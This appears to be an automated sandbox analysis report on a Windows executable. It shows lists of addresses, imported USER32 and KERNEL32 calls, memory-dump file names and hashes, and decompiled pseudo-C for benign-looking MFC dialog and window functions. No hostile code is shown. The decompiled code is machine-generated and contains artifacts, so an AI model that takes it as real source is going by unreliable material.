0x00000000
0x0041fdd9
0x0041fdd9
0x0041fddc
0x0041fe7b
0x0041fe7d
0x00000000
0x0041fe83
0x0041fe85
0x0041fe8b
0x0041fe90
0x0041fe93
0x0041fe96
0x0041fe9b
0x0041fea0
0x0041fea2
0x00000000
0x0041fea8
0x0041fea8
0x0041feac
0x0041fec1
0x0041fec3
0x0041fec5
0x0041fed3
0x0041fed5
0x0041fec7
0x0041fec8
0x0041fec8
0x0041feda
0x0041fedc
0x0041fede
0x0041fee7
0x0041feec
0x0041fef5
0x0041fefb
0x0041fefb
0x0041feae
0x0041feae
0x0041feb4
0x0041feb6
0x0041feb6
0x00000000
0x0041feac
0x0041fea2
0x00000000
0x0041fde2
0x0041fde2
0x0041fde5
0x0041ff25
0x0041ff25
0x0041ff27
0x00000000
0x0041ff2d
0x0041ff30
0x0041ff35
0x0041ff37
0x0041ff38
0x0041ff49
0x0041ff3a
0x0041ff3a
0x0041ff3d
0x0041ff3f
0x0041ff3f
0x0041ff4e
0x0041ff50
0x0041ff52
0x0041ff55
0x0041ff70
0x0041ff70
0x0041ff72
0x0041ff77
0x0041ff79
0x0041ff87
0x0041ff8a
0x00000000
0x0041ff90
0x0041ff90
0x0041ff91
0x0041ff92
0x0041ff93
0x0041ff95
0x0041ff9a
0x0041ff9b
0x0041ff9e
0x0041ffa6
0x00000000
0x0041ffa6
0x0041ff7b
0x0041ff7c
0x00000000
0x0041ff7c
0x0041ff57
0x0041ff5b
0x0041ff66
0x0041ff68
0x0041ff6a
0x00000000
0x00000000
0x00000000
0x00000000
0x0041ff6a
0x0041ff55
0x00000000
0x00000000
0x00000000
0x00000000
0x0041fde5
0x0041fddc
0x0041fdd3
0x0041fdca
0x00000000
0x0041fd34
0x0041fd35
0x0041fd35
0x0041fd36
0x0041fd62
0x0041fd66
0x0041fd6b
0x0041fd72
0x0041fd78
0x0041fd78
0x0041fd7c
0x0041fd80
0x0041fd86
0x0041fd86
0x0041fd8a
0x00000000
0x0041fd90
0x0041fd90
0x0041fd97
0x0041fd9c
0x0041fd9e
0x00000000
0x0041fda0
0x0041fda0
0x0041fda3
0x0041fda5
0x00000000
0x0041fda7
0x0041fda8
0x0041fdaa
0x00420066
0x00420066
0x00420066
0x0041fda5
0x00000000
0x0041fd9e
0x0041fd82
0x0041fd82
0x0041fd84
0x00000000
0x00000000
0x00000000
0x00000000
0x0041fd84
0x0041fd74
0x0041fd74
0x0041fd76
0x00000000
0x00000000
0x00000000
0x00000000
0x0041fd76
0x0041fd38
0x0041fd38
0x0041fd3b
0x0041fdeb
0x0041fdeb
0x0041fdee
0x0041fdf4
0x0041fdfc
0x0041fe02
0x0041fe04
0x0041fe07
0x0041fe12
0x0041fe17
0x0041fe1a
0x0041fe25
0x0041fe2a
0x0041fe2a
0x0041fe1a
0x0041fe07
0x0041fe2b
0x0041fe34
0x0041fe36
0x0041fe38
0x0041fe4c
0x0041fe56
0x0041fe58
0x0041fe5a
0x0041fe6b
0x0041fe6b
0x0041fe5a
0x0041fe70
0x0041fd41
0x0041fd41
0x0041fd44
0x0041fd57
0x0041fd57
0x0041fd5c
0x00000000
0x00000000
0x00000000
0x00000000
0x0041fd46
0x0041fd48
0x0041fd4e
0x0041fd51
0x00000000
0x00000000
0x00000000
0x00000000
0x0041fd51
0x0041fd44
0x0041fd3b
0x0041fd36
0x0041fc69
0x0041fc6f
0x0041fc71
0x0041fc71
0x0041fc75
0x00000000
0x00000000
0x0041fc7d
0x0041fc82
0x0041fc85
0x0041fc92
0x0041fc94
0x0041fc96
0x00000000
0x00000000
0x0041fc96
0x00000000
0x0041fc85
0x0041fc98
0x0041fc9a
0x0041fcbf
0x0041fcbf
0x0041fcc6
0x0041fcd6
0x0041fcd6
0x0041fcd8
0x00000000
0x0041fcda
0x0041fcda
0x0041fcdd
0x0041fcdf
0x00000000
0x0041fce1
0x0041fce4
0x0041fce8
0x0041fcec
0x0041fcf7
0x0041fcf7
0x0041fcfb
0x00000000
0x0041fcfd
0x0041fcfd
0x0041fd04
0x00000000
0x00000000
0x00000000
0x00000000
0x0041fd04
0x0041fcee
0x0041fcee
0x0041fcf5
0x0041fd06
0x0041fd06
0x00000000
0x00000000
0x00000000
0x0041fcf5
0x0041fcec
0x0041fcdf
0x0041fcc8
0x0041fcc8
0x0041fccb
0x00000000
0x0041fccd
0x0041fccd
0x0041fcd4
0x0041fd0d
0x0041fd0d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041fcd4
0x0041fccb
0x0041fc9c
0x0041fc9c
0x0041fc9f
0x0041fca1
0x00000000
0x0041fca3
0x0041fca3
0x0041fca7
0x00000000
0x0041fca9
0x0041fca9
0x0041fcaf
0x0041fcb2
0x0041fcb5
0x0041fcb7
0x00000000
0x0041fcb9
0x0041fcb9
0x0041fcb9
0x0041fcb7
0x0041fca7
0x0041fca1
0x0041fc9a
0x00000000
0x00000000
0x00000000
0x0041fc50
0x0041fe78
0x0041fbd4
0x0041fbd4
0x0041fbd9
0x0041fbdc
0x0041fbe1
0x00000000
0x00000000
0x00000000
0x00000000
0x0041fbe1
0x0041fbae
0x0041fbae
0x0041fbb3
0x0041fbba
0x0041fbb5
0x0041fbb5
0x0041fbb5
0x0041fbbe
0x00000000
0x0041fbc0
0x0041fbc9
0x0041fbe3
0x0041fbe3
0x0041fbe6
0x00000000
0x0041fbe8
0x0041fbe8
0x0041fbeb
0x0041fbed
0x0041fbed
0x0041fbf0
0x0041fbf1
0x0041fbf7
0x00000000
0x00000000
0x00000000
0x00000000
0x0041fbf7
0x0041fbcb
0x0041fbcb
0x0041fbcb
0x0041fbfb
0x0041fbff
0x0041fbff
0x0041fbc9
0x0041fbbe
0x0041fb9a
0x0041fb9a
0x0041fba4
0x0041fba8
0x00000000
0x00000000
0x00000000
0x00000000
0x0041fba8
0x00000000
0x0041fb98
0x0041fbf9
0x0041fbf9
0x00000000

APIs

GetFocus.USER32 ref: 0041FB65
IsWindowEnabled.USER32(?), ref: 0041FBC1
__EH_prolog3_catch.LIBCMT ref: 0041FC0F
GetFocus.USER32 ref: 0041FC2F
GetParent.USER32(?), ref: 0041FC7A
GetParent.USER32(?), ref: 0041FC8A
GetKeyState.USER32(00000012), ref: 0041FD48
IsDialogMessageA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041FDFC
GetFocus.USER32 ref: 0041FE0F
GetFocus.USER32 ref: 0041FE1C
IsWindow.USER32(?), ref: 0041FE34
GetFocus.USER32 ref: 0041FE40
IsWindow.USER32(?), ref: 0041FE56
GetFocus.USER32 ref: 0041FE5C
GetKeyState.USER32(00000010), ref: 0041FE85
MessageBeep.USER32(00000000), ref: 0041FF7C

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
String ID:
API String ID: 656273425-0
Opcode ID: 94b5b08f89b6f3d062ef76d0ef426a4059bfba038a8a02dcf2a8e9e49cc259a4
Instruction ID: 3ed7ecce9206c54ae5f97402f2c519618ca0fdc5251573b007a89f04c8d68588
Opcode Fuzzy Hash: 94b5b08f89b6f3d062ef76d0ef426a4059bfba038a8a02dcf2a8e9e49cc259a4
Instruction Fuzzy Hash: 68F19031A002059BDF20AF65D844AFF77A5AF44354F14413BE806A7262D778ECCBDBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00421EB8, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 127
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00421EB8(void* __ebx, void* __edx, struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				void* _t51;
				intOrPtr _t52;
				signed int _t58;
				void* _t64;
				signed int* _t67;
				void* _t68;
				signed int _t69;
				signed int _t71;

				_t64 = __edx;
				_t51 = __ebx;
				if(_a4 != 0) {
					_push(_t68);
					_push(E0040D295);
					_t54 = 0x450cbc;
					_t69 = E0041720B(__ebx, 0x450cbc, 0, _t68, __eflags);
					__eflags = _t69;
					if(_t69 == 0) {
						E00415838(0x450cbc);
					}
					__eflags =  *(_t69 + 0x18);
					if(__eflags != 0) {
						__eflags = E00410E69(_t51, _t64, 0, _t69, __eflags, _a4);
						if(__eflags == 0) {
							_t54 =  *(_t69 + 0x18);
							E004118E2( *(_t69 + 0x18), __eflags, _a4);
							 *(_t69 + 0x18) = 0;
						}
					}
					_push(_t51);
					_t52 = _a8;
					__eflags = _t52 - 0x110;
					if(_t52 != 0x110) {
						__eflags = _t52 -  *0x452a4c; // 0x0
						if(__eflags == 0) {
							L25:
							SendMessageA(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L26;
						}
						__eflags = _t52 - 0x111;
						if(_t52 != 0x111) {
							L12:
							__eflags = _t52 - 0xc000;
							if(__eflags < 0) {
								L22:
								_t31 = 0;
								goto L26;
							}
							_t71 = E00410E69(_t52, _t64, 0x110, _t69, __eflags, _a4);
							__eflags = _t71;
							if(_t71 == 0) {
								goto L22;
							}
							_t33 = E00416D15(_t71, "4�C");
							__eflags = _t33;
							if(_t33 == 0) {
								L16:
								__eflags = _t52 -  *0x452a40; // 0x0
								if(__eflags != 0) {
									__eflags = _t52 -  *0x452a44; // 0x0
									if(__eflags != 0) {
										__eflags = _t52 -  *0x452a3c; // 0x0
										if(__eflags != 0) {
											__eflags = _t52 -  *0x452a48; // 0x0
											if(__eflags != 0) {
												goto L22;
											}
											_t31 =  *((intOrPtr*)( *_t71 + 0x15c))();
											goto L26;
										}
										_t58 = _a16 >> 0x10;
										__eflags = _t58;
										 *((intOrPtr*)( *_t71 + 0x164))(_a12, _a16 & 0x0000ffff, _t58);
										goto L22;
									}
									_t19 = _t71 + 0x1c4; // 0x1c4
									_t67 = _t19;
									 *_t67 = _a16;
									_t31 =  *((intOrPtr*)( *_t71 + 0x160))();
									 *_t67 =  *_t67 & 0x00000000;
									goto L26;
								}
								_t31 =  *((intOrPtr*)( *_t71 + 0x15c))(_a16);
								goto L26;
							}
							_t40 = E00414508(_t71);
							__eflags =  *(_t40 + 0x34) & 0x00080000;
							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
								goto L22;
							}
							goto L16;
						}
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L25;
						}
						goto L12;
					} else {
						 *0x452a3c = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
						 *0x452a40 = RegisterClipboardFormatA("commdlg_ShareViolation");
						 *0x452a44 = RegisterClipboardFormatA("commdlg_FileNameOK");
						 *0x452a48 = RegisterClipboardFormatA("commdlg_ColorOK");
						 *0x452a4c = RegisterClipboardFormatA("commdlg_help");
						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
						_push(_a16);
						 *0x452a50 = _t46;
						_push(_a12);
						_t31 = E0040C03D(_t52, _t54, _t64, 0x110, RegisterWindowMessageA, _a4, 0x110);
						L26:
						return _t31;
					}
				}
				return 0;
			}

0x00421eb8
0x00421eb8
0x00421ec1
0x00421eca
0x00421ecb
0x00421ed0
0x00421eda
0x00421edc
0x00421ede
0x00421ee0
0x00421ee0
0x00421ee5
0x00421ee8
0x00421ef2
0x00421ef4
0x00421ef9
0x00421efc
0x00421f01
0x00421f01
0x00421ef4
0x00421f04
0x00421f05
0x00421f0d
0x00421f0f
0x00421f73
0x00421f7e
0x00422040
0x0042204b
0x00422053
0x00422053
0x00000000
0x00422053
0x00421f84
0x00421f86
0x00421f94
0x00421f94
0x00421f9a
0x00422028
0x00422028
0x00000000
0x00422028
0x00421fa8
0x00421faa
0x00421fac
0x00000000
0x00000000
0x00421fb5
0x00421fba
0x00421fbc
0x00421fce
0x00421fce
0x00421fd4
0x00421fe5
0x00421feb
0x00422007
0x0042200d
0x0042202c
0x00422032
0x00000000
0x00000000
0x00422038
0x00000000
0x00422038
0x00422014
0x00422014
0x00422022
0x00000000
0x00422022
0x00421ff0
0x00421ff0
0x00421ff6
0x00421ffc
0x00422002
0x00000000
0x00422002
0x00421fdd
0x00000000
0x00421fdd
0x00421fc0
0x00421fc5
0x00421fcc
0x00000000
0x00000000
0x00000000
0x00421fcc
0x00421f88
0x00421f8e
0x00000000
0x00000000
0x00000000
0x00421f11
0x00421f23
0x00421f2f
0x00421f3b
0x00421f47
0x00421f53
0x00421f58
0x00421f5a
0x00421f5d
0x00421f62
0x00421f69
0x00422054
0x00000000
0x00422055
0x00421f0f
0x00000000

APIs

RegisterClipboardFormatA.USER32 ref: 00421F1C
RegisterClipboardFormatA.USER32 ref: 00421F28
RegisterClipboardFormatA.USER32 ref: 00421F34
RegisterClipboardFormatA.USER32 ref: 00421F40
RegisterClipboardFormatA.USER32 ref: 00421F4C
RegisterClipboardFormatA.USER32 ref: 00421F58

Strings

commdlg_LBSelChangedNotify, xrefs: 00421F17
commdlg_SetRGBColor, xrefs: 00421F4E
4C, xrefs: 00421FAE
commdlg_ShareViolation, xrefs: 00421F1E
commdlg_help, xrefs: 00421F42
commdlg_FileNameOK, xrefs: 00421F2A
commdlg_ColorOK, xrefs: 00421F36

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardFormatRegister
String ID: 4C$commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
API String ID: 1228543026-2642033463
Opcode ID: c919d7e6f93383ac7391350e7a2407e9c742391625a53804e92728ed1ae0abcd
Instruction ID: 114c3e48c0948abe4f993226d9b1e8b8b785eaa0f0e38d3170b5998e073e7822
Opcode Fuzzy Hash: c919d7e6f93383ac7391350e7a2407e9c742391625a53804e92728ed1ae0abcd
Instruction Fuzzy Hash: C741D130B00725ABCB369F21EE84AAA3BA1FB54351F60042BF90557261D7B9DC51CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00410816, Relevance: 19.7, APIs: 13, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00410816(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E00415985(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E0040EADE(_t121, E0040EA73(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E0040A3FC();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E0040EADE(_t121, E0040EA73(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E00415C39(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

0x00410816
0x00410816
0x0041081d
0x00410820
0x00410828
0x0041082b
0x00410830
0x0041083e
0x00410850
0x00410840
0x00410843
0x00410843
0x00410856
0x0041085a
0x00410866
0x0041086e
0x00410870
0x00410870
0x0041086e
0x00410832
0x00410832
0x00410832
0x00410832
0x00410872
0x00410880
0x00410889
0x00410929
0x00410930
0x00410937
0x00410941
0x0041088f
0x00410891
0x00410896
0x004108a1
0x004108aa
0x004108aa
0x004108a1
0x004108ae
0x004108b5
0x004108f6
0x00410905
0x00410912
0x004108b7
0x004108b7
0x004108be
0x004108c0
0x004108c0
0x004108d0
0x004108e3
0x004108ed
0x004108ed
0x004108b5
0x00410950
0x00410955
0x0041095a
0x0041095e
0x00410961
0x00410968
0x00410970
0x00410978
0x00410980
0x00410987
0x0041098c
0x00410998
0x004109a0
0x004109a0
0x0041098e
0x0041098e
0x0041098e
0x004109a6
0x004109b5
0x004109bd
0x004109bd
0x004109a8
0x004109a8
0x004109a8
0x004109d5

APIs

Part of subcall function 00415985: GetWindowLongA.USER32 ref: 00415990

GetParent.USER32(?), ref: 00410843
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 00410866
GetWindowRect.USER32 ref: 00410880
GetWindowLongA.USER32 ref: 00410896
CopyRect.USER32 ref: 004108E3
CopyRect.USER32 ref: 004108ED
GetWindowRect.USER32 ref: 004108F6
CopyRect.USER32 ref: 00410912

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID:
API String ID: 808654186-0
Opcode ID: ee263a79baa54013d2b61d8ac3c6d9245b72c3f309f3bb1b80fd0c75ebe345cf
Instruction ID: a9eef657a1d3848816d1b54d3c08cca2d49c3a91070fde182695b067e2d910b9
Opcode Fuzzy Hash: ee263a79baa54013d2b61d8ac3c6d9245b72c3f309f3bb1b80fd0c75ebe345cf
Instruction Fuzzy Hash: A7516F72D00219ABDB00DFA9DC85EEEBBB9BF48314F154126F905F3291D774E9818B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A471, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A471(intOrPtr* __ecx, intOrPtr _a4) {
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x450c9c; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					if(_t15 == 0) {
						L2:
						E00415838(_t12);
					}
					 *0x450c8c = GetProcAddress(_t15, "CreateActCtxA");
					 *0x450c90 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x450c94 = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x450c8c; // 0x0
					 *0x450c98 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x450c90; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x450c94; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(_t9 != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x450c90; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x450c94; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x450c9c = 1;
				}
				return _t18;
			}

0x0040a471
0x0040a477
0x0040a47b
0x0040a47e
0x0040a481
0x0040a488
0x0040a499
0x0040a49d
0x0040a49f
0x0040a49f
0x0040a49f
0x0040a4b9
0x0040a4c6
0x0040a4d3
0x0040a4d8
0x0040a4da
0x0040a4e0
0x0040a4e5
0x0040a4e6
0x0040a4fe
0x0040a504
0x00000000
0x0040a506
0x0040a506
0x0040a50c
0x00000000
0x0040a50e
0x0040a50e
0x0040a510
0x00000000
0x00000000
0x0040a510
0x0040a50c
0x0040a4e8
0x0040a4e8
0x0040a4ee
0x00000000
0x0040a4f0
0x0040a4f0
0x0040a4f6
0x00000000
0x0040a4f8
0x0040a4fa
0x00000000
0x0040a4fc
0x0040a4fa
0x0040a4f6
0x0040a4ee
0x0040a512
0x0040a512
0x0040a51e

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,0040AF45,000000FF), ref: 0040A493
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 0040A4B1
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 0040A4BE
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 0040A4CB
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 0040A4D8

Strings

CreateActCtxA, xrefs: 0040A4AB
KERNEL32, xrefs: 0040A48E
DeactivateActCtx, xrefs: 0040A4CD
ReleaseActCtx, xrefs: 0040A4B3
ActivateActCtx, xrefs: 0040A4C0

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 96203baa230df5da1a45adee60155c894b823ff8c2b8d06b44f0905554ffa9d5
Instruction ID: 57158f2fb09f2e5bca614e5f684be6b8f22036b14f88b861c83f32c1704082e2
Opcode Fuzzy Hash: 96203baa230df5da1a45adee60155c894b823ff8c2b8d06b44f0905554ffa9d5
Instruction Fuzzy Hash: 9F1106789013409FCB26EF657C8A41B7B94A756716710057FF108D3262EAB898A0CE0E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7B2, Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040C7B2(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t97;
				struct HINSTANCE__* _t99;
				signed int _t100;
				void* _t101;
				intOrPtr* _t103;
				void* _t104;
				void* _t105;

				_t105 = __eflags;
				_t97 = __edx;
				_push(0x24);
				E0042720D(E00439A9C, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t104 - 0x20)) = __ecx;
				 *(_t104 - 0x1c) =  *(__ecx + 0x60);
				 *(_t104 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E0040E67F(__ebx, __edi, __ecx, _t105);
				_t99 =  *(_t54 + 0xc);
				_t84 = 0;
				_t106 =  *(_t103 + 0x58);
				if( *(_t103 + 0x58) != 0) {
					_t99 =  *(E0040E67F(0, _t99, _t103, _t106) + 0xc);
					_t54 = LoadResource(_t99, FindResourceA(_t99,  *(_t103 + 0x58), 5));
					 *(_t104 - 0x18) = _t54;
				}
				if( *(_t104 - 0x18) != _t84) {
					_t54 = LockResource( *(_t104 - 0x18));
					 *(_t104 - 0x1c) = _t54;
				}
				if( *(_t104 - 0x1c) != _t84) {
					 *(_t104 - 0x14) = E0040C30C(_t84, _t103, __eflags);
					E00410EEA(_t84, _t99, _t103, __eflags);
					 *(_t104 - 0x28) =  *(_t104 - 0x28) & _t84;
					__eflags =  *(_t104 - 0x14) - _t84;
					 *(_t104 - 0x2c) = _t84;
					 *(_t104 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t104 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t104 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t104 - 0x14), 0);
								 *(_t104 - 0x2c) = 1;
								_t84 = E0040A3FC();
								__eflags = _t84;
								 *(_t104 - 0x24) = _t84;
								if(__eflags != 0) {
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										__eflags = E00415A74(_t84);
										if(__eflags != 0) {
											E00415A8F(_t84, 0);
											 *(_t104 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
					E004128B9(_t84, _t99, __eflags, _t103);
					_t58 = E00410E42(_t84, _t104,  *(_t104 - 0x14));
					_push(_t99);
					_push(_t58);
					_push( *(_t104 - 0x1c));
					_t59 = E0040C5C2(_t84, _t103, _t97, _t99, _t103, __eflags);
					_t100 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t103 + 0x3c) & 0x00000010;
						if(( *(_t103 + 0x3c) & 0x00000010) != 0) {
							_t101 = 4;
							_t71 = E00415985(_t103);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t101 = 5;
							}
							E004109D8(_t103, _t97, _t101);
							_t100 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t103 + 0x20)) - _t100;
						if( *((intOrPtr*)(_t103 + 0x20)) != _t100) {
							E00415C39(_t103, _t100, _t100, _t100, _t100, _t100, 0x97);
						}
					}
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					__eflags =  *(_t104 - 0x28) - _t100;
					if( *(_t104 - 0x28) != _t100) {
						E00415A8F(_t84, 1);
					}
					__eflags =  *(_t104 - 0x2c) - _t100;
					if( *(_t104 - 0x2c) != _t100) {
						EnableWindow( *(_t104 - 0x14), 1);
					}
					__eflags =  *(_t104 - 0x14) - _t100;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t103 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t104 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t103 + 0x60))();
					E0040C346(_t84, _t103, _t100, _t103, __eflags);
					__eflags =  *(_t103 + 0x58) - _t100;
					if( *(_t103 + 0x58) != _t100) {
						FreeResource( *(_t104 - 0x18));
					}
					_t63 =  *(_t103 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E004272B2(_t63);
				}
			}

0x0040c7b2
0x0040c7b2
0x0040c7b2
